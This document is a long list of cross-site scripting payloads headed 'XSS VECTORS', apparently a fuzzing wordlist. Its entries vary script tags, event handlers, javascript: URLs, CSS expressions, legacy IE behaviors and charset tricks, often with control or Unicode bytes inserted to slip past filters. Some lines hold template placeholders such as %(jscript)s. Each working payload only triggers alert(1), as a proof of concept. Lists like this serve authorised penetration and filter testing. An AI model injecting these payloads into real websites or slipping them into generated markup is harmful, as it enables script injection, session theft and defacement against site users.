XSS VECTORS
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> | |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |
<video src=1 href=1 onerror="javascript:alert(1)"></video> | |
<body src=1 href=1 onerror="javascript:alert(1)"></body> | |
<image src=1 href=1 onerror="javascript:alert(1)"></image> | |
<object src=1 href=1 onerror="javascript:alert(1)"></object> | |
<script src=1 href=1 onerror="javascript:alert(1)"></script> | |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |
<object onError object onError="javascript:javascript:alert(1)"></object onError> | |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |
<body onload body onload="javascript:javascript:alert(1)"></body onload> | |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |
\x3Cscript>javascript:alert(1)</script> | |
'"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |
<script>javascript:alert(1)</script\x0D | |
<script>javascript:alert(1)</script\x0A | |
<script>javascript:alert(1)</script\x0B | |
<script charset="\x22>javascript:alert(1)</script> | |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |
`"'><img src='#\x27 onerror=javascript:alert(1)> | |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> | |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> | |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<script>/* *\x2A/javascript:alert(1)// */</script> | |
<script>/* *\x00/javascript:alert(1)// */</script> | |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> | |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> | |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF | |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF | |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> | |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> | |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> | |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> | |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> | |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> | |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> | |
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |
"`'><script>\x3Bjavascript:alert(1)</script> | |
"`'><script>\x0Djavascript:alert(1)</script> | |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |
"`'><script>\x09javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |
"`'><script>\x00javascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |
"`'><script>\x0Cjavascript:alert(1)</script> | |
"`'><script>\x2Bjavascript:alert(1)</script> | |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |
"`'><script>-javascript:alert(1)</script> | |
"`'><script>\x0Ajavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |
"`'><script>\x7Ejavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |
"`'><script>\xC2\x85javascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |
"`'><script>\x21javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |
"`'><script>\x0Bjavascript:alert(1)</script> | |
"`'><script>\x20javascript:alert(1)</script> | |
"`'><script>\xC2\xA0javascript:alert(1)</script> | |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> | |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> | |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> | |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> | |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> | |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> | |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> | |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> | |
<script\x2F>javascript:alert(1)</script> | |
<script\x20>javascript:alert(1)</script> | |
<script\x0D>javascript:alert(1)</script> | |
<script\x0A>javascript:alert(1)</script> | |
<script\x0C>javascript:alert(1)</script> | |
<script\x00>javascript:alert(1)</script> | |
<script\x09>javascript:alert(1)</script> | |
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x00=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x20=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> | |
`"'><img src=xxx:x onerror\x09=javascript:alert(1)> | |
<script>javascript:alert(1)<\x00/script> | |
<img src=# onerror\x3D"javascript:alert(1)" > | |
<input onfocus=javascript:alert(1) autofocus> | |
<input onblur=javascript:alert(1) autofocus><input autofocus> | |
<video poster=javascript:javascript:alert(1)// | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X | |
<video><source onerror="javascript:javascript:alert(1)"> | |
<video onerror="javascript:javascript:alert(1)"><source> | |
<form><button formaction="javascript:javascript:alert(1)">X | |
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |
<object data="data:text/html;base64,%(base64)s"> | |
<embed src="data:text/html;base64,%(base64)s"> | |
<b <script>alert(1)</script>0 | |
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |
<embed src="javascript:alert(1)"> | |
<img src="javascript:alert(1)"> | |
<image src="javascript:alert(1)"> | |
<script src="javascript:alert(1)"> | |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |
<? foo="><script>javascript:alert(1)</script>"> | |
<! foo="><script>javascript:alert(1)</script>"> | |
</ foo="><script>javascript:alert(1)</script>"> | |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |
<img \x00src=x onerror="alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x11src=x onerror="javascript:alert(1)"> | |
<img \x12src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x10src=x onerror="javascript:alert(1)"> | |
<img\x13src=x onerror="javascript:alert(1)"> | |
<img\x32src=x onerror="javascript:alert(1)"> | |
<img\x47src=x onerror="javascript:alert(1)"> | |
<img\x11src=x onerror="javascript:alert(1)"> | |
<img \x47src=x onerror="javascript:alert(1)"> | |
<img \x34src=x onerror="javascript:alert(1)"> | |
<img \x39src=x onerror="javascript:alert(1)"> | |
<img \x00src=x onerror="javascript:alert(1)"> | |
<img src\x09=x onerror="javascript:alert(1)"> | |
<img src\x10=x onerror="javascript:alert(1)"> | |
<img src\x13=x onerror="javascript:alert(1)"> | |
<img src\x32=x onerror="javascript:alert(1)"> | |
<img src\x12=x onerror="javascript:alert(1)"> | |
<img src\x11=x onerror="javascript:alert(1)"> | |
<img src\x00=x onerror="javascript:alert(1)"> | |
<img src\x47=x onerror="javascript:alert(1)"> | |
<img src=x\x09onerror="javascript:alert(1)"> | |
<img src=x\x10onerror="javascript:alert(1)"> | |
<img src=x\x11onerror="javascript:alert(1)"> | |
<img src=x\x12onerror="javascript:alert(1)"> | |
<img src=x\x13onerror="javascript:alert(1)"> | |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |
<img src=x onerror=\x09"javascript:alert(1)"> | |
<img src=x onerror=\x10"javascript:alert(1)"> | |
<img src=x onerror=\x11"javascript:alert(1)"> | |
<img src=x onerror=\x12"javascript:alert(1)"> | |
<img src=x onerror=\x32"javascript:alert(1)"> | |
<img src=x onerror=\x00"javascript:alert(1)"> | |
<a href=javascript:javascript:alert(1)>XXX</a> | |
<img src="x` `<script>javascript:alert(1)</script>"` `> | |
<img src onerror /" '"= alt=javascript:alert(1)//"> | |
<title onpropertychange=javascript:alert(1)></title><title title=> | |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |
<!--[if]><script>javascript:alert(1)</script --> | |
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |
<script src="/\%(jscript)s"></script> | |
<script src="\\%(jscript)s"></script> | |
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> | |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X | |
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> | |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d | |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> | |
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> | |
<style>*[{}@import'%(css)s?]</style>X | |
<div style="font-family:'foo ;color:red;';">XXX | |
<div style="font-family:foo}color=red;">XXX | |
<// style=x:expression\28javascript:alert(1)\29> | |
<style>*{x:expression(javascript:alert(1))}</style> | |
<div style=content:url(%(svg)s)></div> | |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X | |
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> | |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X | |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X | |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> | |
<x style="background:url('x;color:red;/*')">XXX</x> | |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> | |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> | |
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> | |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> | |
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ | |
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > | |
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> | |
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> | |
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> | |
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> | |
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> | |
<x style="behavior:url(%(sct)s)"> | |
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> | |
<event-source src="%(event)s" onload="javascript:alert(1)"> | |
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> | |
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> | |
<script>%(payload)s</script> | |
<script src=%(jscript)s></script> | |
<script language='javascript' src='%(jscript)s'></script> | |
<script>javascript:alert(1)</script> | |
<IMG SRC="javascript:javascript:alert(1);"> | |
<IMG SRC=javascript:javascript:alert(1)> | |
<IMG SRC=`javascript:javascript:alert(1)`> | |
<SCRIPT SRC=%(jscript)s?<B> | |
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> | |
<BODY ONLOAD=javascript:alert(1)> | |
<BODY ONLOAD=javascript:javascript:alert(1)> | |
<IMG SRC="jav ascript:javascript:alert(1);"> | |
